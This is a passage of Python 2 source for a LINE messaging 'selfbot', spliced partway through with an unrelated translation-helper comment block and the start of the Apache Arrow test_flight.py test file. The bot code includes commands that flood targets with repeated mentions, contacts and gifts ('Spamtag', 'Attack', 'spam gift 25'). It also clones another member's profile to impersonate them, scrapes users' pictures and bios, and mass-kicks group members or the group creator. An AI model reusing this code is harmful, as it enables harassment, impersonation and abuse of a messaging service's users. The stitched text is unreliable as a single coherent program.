subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===") elif msg.text.lower() == 'cpu': botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===") elif "Restart" in msg.text: print "[Command]Restart" try: cl.sendText(msg.to,"Restarting...") cl.sendText(msg.to,"Restart Success") restart_program() except: cl.sendText(msg.to,"Please wait") restart_program() pass elif "Turn off" in msg.text: try: import sys sys.exit() except: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot has been active "+waktu(eltime) cl.sendText(msg.to,van) #================================ STARTED ==============================================# elif "google " in msg.text: a = msg.text.replace("google ","") b = urllib.quote(a) cl.sendText(msg.to,"โปรดรอสักครู่...") cl.sendText(msg.to, "https://www.google.com/" + b) cl.sendText(msg.to,"Ketemu om ^") elif cms(msg.text,["/creator","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "u46a050ebcc66a90b47fae6256547cc53"} cl.sendMessage(msg) elif "Clone " in msg.text: copy0 = msg.text.replace("Clone ","") copy1 = copy0.lstrip() copy2 = copy1.replace("@","") copy3 = copy2.rstrip() _name = copy3 group = cl.getGroup(msg.to) for contact in group.members: cname = cl.getContact(contact.mid).displayName if cname == _name: cl.CloneContactProfile(contact.mid) cl.sendText(msg.to, "เลียนแบบสำเร็จ") else: pass elif "friendpp: " in msg.text: if msg.from_ in admin: suf = msg.text.replace('friendpp: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == suf: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Checkmid: " in msg.text: saya = msg.text.replace("Checkmid: ","") msg.contentType = 13 msg.contentMetadata = {"mid":saya} cl.sendMessage(msg) contact = cl.getContact(saya) cu = cl.channel.getCover(saya) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "Checkid: " in msg.text: saya = msg.text.replace("Checkid: ","") gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).id group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif msg.text in ["เพื่อน"]: contactlist = cl.getAllContactIds() kontak = cl.getContacts(contactlist) num=1 msgs="═════════List Friend═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List 
Friend═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Memlist"]: kontak = cl.getGroup(msg.to) group = kontak.members num=1 msgs="═════════List Member═════════-" for ids in group: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group) cl.sendText(msg.to, msgs) elif "Friendinfo: " in msg.text: saya = msg.text.replace('Friendinfo: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName contact = cl.getContact(i) cu = cl.channel.getCover(i) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus if h == saya: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) elif "Friendpict: " in msg.text: saya = msg.text.replace('Friendpict: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif msg.text in ["Friendlistmid"]: gruplist = cl.getAllContactIds() kontak = cl.getContacts(gruplist) num=1 msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.mid) num=(num+1) msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Blocklist"]: blockedlist = cl.getBlockedContactIds() kontak = cl.getContacts(blockedlist) num=1 msgs="═════════List Blocked═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplist"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List Grup═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.name) num=(num+1) msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplistmid"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List GrupMid═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.id) num=(num+1) msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif "Grupimage: " in msg.text: saya = msg.text.replace('Grupimage: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name gna = cl.getGroup(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Grupname" in msg.text: saya = msg.text.replace('Grupname','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name) elif "Grupid" in msg.text: saya = msg.text.replace('Grupid','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id) elif "Grupinfo: " in msg.text: saya = msg.text.replace('Grupinfo: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" 
+ "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) print "Spamtag Berhasil." elif "รันคท @" in msg.text: _name = msg.text.replace("รันคท @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: msg.contentType = 13 msg.contentMetadata = {'mid': "u46a050ebcc66a90b47fae6256547cc53',"} cl.sendText(g.mid,"Spam") cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendText(msg.to, "Done") print " Spammed !" elif "playstore " in msg.text.lower(): tob = msg.text.lower().replace("playstore ","") cl.sendText(msg.to,"Sedang Mencari om...") cl.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob) cl.sendText(msg.to,"Ketemu om ^") elif 'wikipedia ' in msg.text.lower(): try: wiki = msg.text.lower().replace("wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=3) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Teks nya kepanjangan! 
ketik link dibawah aja\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "say " in msg.text.lower(): say = msg.text.lower().replace("say ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif msg.text in ["spam gift 25"]: msg.contentType = 9 msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4', 'PRDTYPE': 'THEME', 'MSGTPL': '8'} msg.text = None cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text in ["Gcreator:inv"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.inviteIntoGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif msg.text in ["Gcreator:kick"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.kickoutFromGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif 'lirik ' in msg.text.lower(): try: songname = msg.text.lower().replace('lirik ','') params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Getcover @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except: pass print "[Command]dp executed" elif "idline: " in msg.text: msgg = msg.text.replace('idline: ','') conn = cl.findContactsByUserid(msgg) if True: msg.contentType = 13 msg.contentMetadata = {'mid': conn.mid} cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg) cl.sendMessage(msg) elif "ดึงกลับ" in msg.text.split(): if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: try: grCans = [contact.mid for contact in group.invitee] cl.findAndAddContactByMid(msg.to, grCans) cl.cancelGroupInvitation(msg.to, grCans) cl.inviteIntoGroup(msg.to, grCans) except Exception as error: print error else: if wait["lang"] == "JP": cl.sendText(msg.to,"No Invited") else: cl.sendText(msg.to,"Error") else: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot sudah berjalan selama "+waktu(eltime) cl.sendText(msg.to,van) elif msg.text in ["Restart"]: cl.sendText(msg.to, "Bot has been restarted") restart_program() print "@Restart" elif msg.text in ["time"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", 
"Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" client.sendText(msg.to, rst) elif "image " in msg.text: search = msg.text.replace("image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif 'instagram ' in msg.text.lower(): try: instagram = msg.text.lower().replace("instagram ","") html = requests.get('https://www.instagram.com/' + instagram + '/?') soup = BeautifulSoup(html.text, 'html5lib') data = soup.find_all('meta', attrs={'property':'og:description'}) text = data[0].get('content').split() data1 = soup.find_all('meta', attrs={'property':'og:image'}) text1 = data1[0].get('content').split() user = "Name: " + text[-2] + "\n" user1 = "Username: " + text[-1] + "\n" followers = "Followers: " + text[0] + "\n" following = "Following: " + text[2] + "\n" post = "Post: " + text[4] + "\n" link = "Link: " + "https://www.instagram.com/" + instagram detail = "**INSTAGRAM INFO USER**\n" details = "\n**INSTAGRAM INFO USER**" cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details) cl.sendImageWithURL(msg.to, text1[0]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif msg.text in ["Attack"]: msg.contentType = 13 msg.contentMetadata = {'mid': "u46a050ebcc66a90b47fae6256547cc53',"} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text.lower() == 'สุดหล่อ': msg.contentType = 13 msg.contentMetadata = {'mid': "u94a1bc387b927e86756334648d314f86',"} cl.sendMessage(msg) #================================= FINISHED =============================================# elif "Ban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Ban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: wait["blacklist"][target] = True cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Unban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: del wait["blacklist"][target] cl.sendText(msg.to,_nametarget + " Delete From Blacklist") except: cl.sendText(msg.to,_nametarget + " Not In Blacklist") elif "Ban:" in msg.text: nk0 = msg.text.replace("Ban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in 
s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban:" in msg.text: nk0 = msg.text.replace("Unban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: del wait["blacklist"][target] f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Delete From Blacklist") except: cl.sendText(msg.to,_name + " Not In Blacklist") elif msg.text in ["ล้างดำ"]: wait["blacklist"] = {} cl.sendText(msg.to,"ล้างดำในรายการที่ถูกแบนเรียบร้อย") elif msg.text in ["Ban:on"]: wait["wblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Unban:on"]: wait["dblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Banlist"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Banlist") num=1 msgs="*Blacklist*" for mi_d in wait["blacklist"]: msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName) num=(num+1) msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"]) cl.sendText(msg.to, msgs) elif msg.text in ["Conban","Contactban","Contact ban"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Blacklist") h = "" for i in wait["blacklist"]: h = cl.getContact(i) M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': i} cl.sendMessage(M) elif msg.text in ["Midban","Mid ban"]: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) num=1 cocoa = "══════════List Blacklist═════════" for mm in matched_list: cocoa+="\n[%i] %s" % (num, mm) num=(num+1) cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list) cl.sendText(msg.to,cocoa) elif msg.text.lower() == 'scan blacklist': if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: cl.sendText(msg.to,"Tidak ada Daftar Blacklist") return for jj in matched_list: try: cl.kickoutFromGroup(msg.to,[jj]) print (msg.to,[jj]) except: pass #==============================================# if op.type == 17: if op.param2 not in Bots: if op.param2 in Bots: pass if wait["protect"] == True: if wait["blacklist"][op.param2] == True: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: pass if op.type == 19: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["protect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) cl.inviteIntoGroup(op.param1,[op.param2]) if op.type == 13: 
if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["cancelprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.type == 11: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["linkprotect"] == True: wait ["blacklist"][op.param2] = True G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) cl.kickoutFromGroup(op.param1,[op.param2]) if op.type == 5: if wait["autoAdd"] == True: if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 11: if wait["linkprotect"] == True: if op.param2 not in Bots: G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.kickoutFromGroup(op.param1,[op.param3]) cl.updateGroup(G) # ----------------- NOTIFED MEMBER JOIN GROUP if op.type == 17: #if wait["sambut"] == True: if op.param2 in admin: return ginfo = cl.getGroup(op.param1) contact = cl.getContact(op.param2) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(op.param1," สวัสดี " + cl.getContact(op.param2).displayName + "\nยินดีต้อนรับเข้าร่วมกลุ่ม\n👉 " + str(ginfo.name) + " 👈" + "\nเข้ามาแล้วทำตัวดีๆน่ะ " +datetime.today().strftime('%H:%M:%S')) cl.sendImageWithURL(op.param1,image) print "ada orang masuk grup" if msg.contentType == 16: url = msg.contentMetadata["postEndUrl"] #------------------ KICK OUT FORM GROUP if op.type == 19: if op.param2 in Bots: return ginfo = cl.getGroup(op.param1) contact = cl.getContact(op.param2) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(op.param1,cl.getContact(op.param2).displayName + " มึงแกล้งน้องเค้าอีกแระบักปอบ") cl.sendImageWithURL(op.param1,image) print "MEMBER KICK OUT FORM GROUP" if op.type == 15: if op.param2 in Bots: return ginfo = cl.getGroup(op.param1) contact = cl.getContact(op.param2) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus random.choice(KAC).sendText(op.param1,"เฮ้ยๆ" + cl.getContact(op.param2).displayName + "จะรีบออกไปใหนแว้...😒😒") cl.sendImageWithURL(op.param1,image) print "MEMBER HAS LEFT THE GROUP" #------------------------------------------------------------------------------# if op.type == 59: print op except Exception as error: print error def autolike(): count = 1 while True: try: for posts in cl.activity(1)["result"]["posts"]: if posts["postInfo"]["liked"] is False: if wait["likeOn"] == True: cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001) print "Like" if wait["commentOn"] == True: if posts["userInfo"]["writerMid"] in wait["commentBlack"]: pass else: cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"]) except: count += 1 if(count == 50): sys.exit(0) else: pass thread2 = threading.Thread(target=autolike) thread2.daemon = True thread2.start() def likefriend(): for zx in range(0,200): hasil = cl.activity(limit=200) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001) print "Like" except: pass else: print "Already Liked On" time.sleep(0.60) def likeme(): for zx in range(0,200): hasil = 
        cl.activity(limit=200)
        if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
            if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
                try:
                    cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    print "Like"
                except:
                    pass
        else:
            print "Status Sudah di Like On"


while True:
    try:
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
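# --- Illustrative sketch, not part of the original bot code --------------
# The Id@en / En@id / Id@jp / ... branches above repeat the same
# translate.google.com scraping with only the language pair changed.
# A single table-driven helper could cover all of them; the names
# `translate_via_google` and `LANG_PAIRS` below are hypothetical, but the
# urllib2 request and the 'class="t0">' marker are exactly what the
# branches above already use.
import urllib2

LANG_PAIRS = {
    "Id@en": ("id", "en"), "En@id": ("en", "id"),
    "Id@jp": ("id", "ja"), "Jp@id": ("ja", "id"),
    "Id@th": ("id", "th"), "Th@id": ("th", "id"),
    "Id@ar": ("id", "ar"), "Ar@id": ("ar", "id"),
    "Id@ko": ("id", "ko"), "Ko@id": ("ko", "id"),
}

def translate_via_google(text, src, dst):
    # Fetch the mobile Google Translate page and pull the first result
    # out of the 'class="t0">' element, as the branches above do.
    url = ('https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s'
           % (src, dst, text.replace(" ", "+")))
    request = urllib2.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    page = urllib2.urlopen(request).read()
    marker = 'class="t0">'
    result = page[page.find(marker) + len(marker):]
    return result.split("<")[0]
# --------------------------------------------------------------------------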
test_flight.py
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

import base64
import contextlib
import os
import socket
import struct
import tempfile
import threading
import time
import traceback

import pytest

import pyarrow as pa

from pyarrow.compat import tobytes
from pyarrow.util import pathlib

try:
    from pyarrow import flight
    from pyarrow.flight import (
        FlightServerBase, ServerAuthHandler, ClientAuthHandler
    )
except ImportError:
    flight = None
    FlightServerBase = object
    ServerAuthHandler, ClientAuthHandler = object, object


# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight


def test_import():
    # So we see the ImportError somewhere
    import pyarrow.flight  # noqa


def resource_root():
    """Get the path to the test resources directory."""
    if not os.environ.get("ARROW_TEST_DATA"):
        raise RuntimeError("Test resources not found; set "
                           "ARROW_TEST_DATA to <repo root>/testing")
    return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"


def read_flight_resource(path):
    """Get the contents of a test resource file."""
    root = resource_root()
    if not root:
        return None
    try:
        with (root / path).open("rb") as f:
            return f.read()
    except FileNotFoundError:
        raise RuntimeError(
            "Test resource {} not found; did you initialize the "
            "test resource submodule?\n{}".format(root / path,
                                                  traceback.format_exc()))


def example_tls_certs():
    """Get the paths to test TLS certificates."""
    return {
        "root_cert": read_flight_resource("root-ca.pem"),
        "certificates": [
            flight.CertKeyPair(
                cert=read_flight_resource("cert0.pem"),
                key=read_flight_resource("cert0.key"),
            ),
            flight.CertKeyPair(
                cert=read_flight_resource("cert1.pem"),
                key=read_flight_resource("cert1.key"),
            ),
        ]
    }


def simple_ints_table():
    data = [
        pa.array([-10, -5, 0, 5, 10])
    ]
    return pa.Table.from_arrays(data, names=['some_ints'])


def simple_dicts_table():
    dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
    data = [
        pa.chunked_array([
            pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
            pa.DictionaryArray.from_arrays([2, 1], dict_values)]),
    ]
    return pa.Table.from_arrays(data, names=['some_dicts'])


class ConstantFlightServer(FlightServerBase):
    """A Flight server that always returns the same data.

    See ARROW-4796: this server implementation will segfault if Flight
    does not properly hold a reference to the Table object.
    """

    def __init__(self):
        super(ConstantFlightServer, self).__init__()
        # Ticket -> Table
        self.table_factories = {
            b'ints': simple_ints_table,
            b'dicts': simple_dicts_table,
        }

    def do_get(self, context, ticket):
        # Return a fresh table, so that Flight is the only one keeping a
        # reference.
        table = self.table_factories[ticket.ticket]()
        return flight.RecordBatchStream(table)


class MetadataFlightServer(FlightServerBase):
    """A Flight server that numbers incoming/outgoing data."""

    def do_get(self, context, ticket):
        data = [
            pa.array([-10, -5, 0, 5, 10])
        ]
        table = pa.Table.from_arrays(data, names=['a'])
        return flight.GeneratorStream(
            table.schema,
            self.number_batches(table))

    def do_put(self, context, descriptor, reader, writer):
        counter = 0
        expected_data = [-10, -5, 0, 5, 10]
        while True:
            try:
                batch, buf = reader.read_chunk()
                assert batch.equals(pa.RecordBatch.from_arrays(
                    [pa.array([expected_data[counter]])],
                    ['a']
                ))
                assert buf is not None
                client_counter, = struct.unpack('<i', buf.to_pybytes())
                assert counter == client_counter
                writer.write(struct.pack('<i', counter))
                counter += 1
            except StopIteration:
                return

    @staticmethod
    def number_batches(table):
        for idx, batch in enumerate(table.to_batches()):
            buf = struct.pack('<i', idx)
            yield batch, buf


class EchoFlightServer(FlightServerBase):
    """A Flight server that returns the last data uploaded."""

    def __init__(self, expected_schema=None):
        super(EchoFlightServer, self).__init__()
        self.last_message = None
        self.expected_schema = expected_schema

    def do_get(self, context, ticket):
        return flight.RecordBatchStream(self.last_message)

    def do_put(self, context, descriptor, reader, writer):
        if self.expected_schema:
            assert self.expected_schema == reader.schema
        self.last_message = reader.read_all()


